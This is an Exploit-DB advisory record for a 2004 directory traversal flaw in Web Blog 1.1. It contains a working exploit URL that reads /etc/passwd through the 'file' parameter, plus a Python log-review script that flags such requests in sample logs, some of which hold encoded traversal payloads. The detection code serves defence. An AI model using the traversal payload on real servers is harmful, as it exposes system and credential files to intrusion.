ID: EDB-ID:23613
Type: exploitdb
Reporter: Zone-h Security Team
Modified: 2004-01-20T00:00:00
Description
source: https://www.securityfocus.com/bid/9517/info
Web Blog is prone to a file disclosure vulnerability. Remote attackers may gain access to files on the system hosting the server that reside outside of the server root by submitting a malicious request that contains directory traversal sequences. This would permit the attacker to access files that are readable by the server and could disclose sensitive information.
http://www.example.com/directory/blog.cgi?submit=ViewFile&month=[month]&year=[year]&file=/../../../../../../../../../../../../../../../../etc/passwd
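A log-review check for the request pattern above, added here as an example; it is not part of the original advisory or of Web Blog itself. The function names, the combined-log format and the sample lines are assumptions, as is the premise that legitimate `file` values are plain relative names.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Jan/2004:10:00:01 +0000] "GET /directory/blog.cgi?submit=ViewFile&month=01&year=2004&file=entry1.txt HTTP/1.0" 200 812',
    '192.0.2.44 - - [20/Jan/2004:10:02:13 +0000] "GET /directory/blog.cgi?submit=ViewFile&month=01&year=2004&file=/../../../../etc/passwd HTTP/1.0" 200 1544',
    '192.0.2.45 - - [20/Jan/2004:10:02:40 +0000] "GET /directory/blog.cgi?submit=ViewFile&month=01&year=2004&file=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.0" 200 1544',
    '192.0.2.10 - - [20/Jan/2004:10:03:02 +0000] "GET /index.html HTTP/1.0" 200 2048',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def normalise(value, rounds=3):
    """Percent-decode repeatedly (bounded) and unify path separators."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/")

def is_traversal(value):
    """True when the value is absolute or has a '..' path segment.
    Assumption: legitimate 'file' values are plain relative names."""
    path = normalise(value)
    return path.startswith("/") or ".." in path.split("/")

def suspicious_viewfile_requests(lines):
    """Return (client, decoded file value) for flagged blog.cgi ViewFile requests."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/blog.cgi"):
            continue
        params = parse_qs(url.query, keep_blank_values=True)  # decodes once
        if "ViewFile" not in params.get("submit", []):
            continue
        for value in params.get("file", []):
            if is_traversal(value):
                hits.append((line.split()[0], value))
    return hits

if __name__ == "__main__":
    for client, value in suspicious_viewfile_requests(SAMPLE_LOG):
        print(client, value)
```

A 200 response on a flagged line, as in the constructed samples, is the case to triage first, since it suggests the file was actually served.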
Title: Leif M. Wright Web Blog 1.1 - File Disclosure
Published: 2004-01-20T00:00:00
CVE: 2004-2127
OSVDB: 3739
Exploit type: webapps
Verified: true
Href: https://www.exploit-db.com/exploits/23613
Source href: https://www.exploit-db.com/download/23613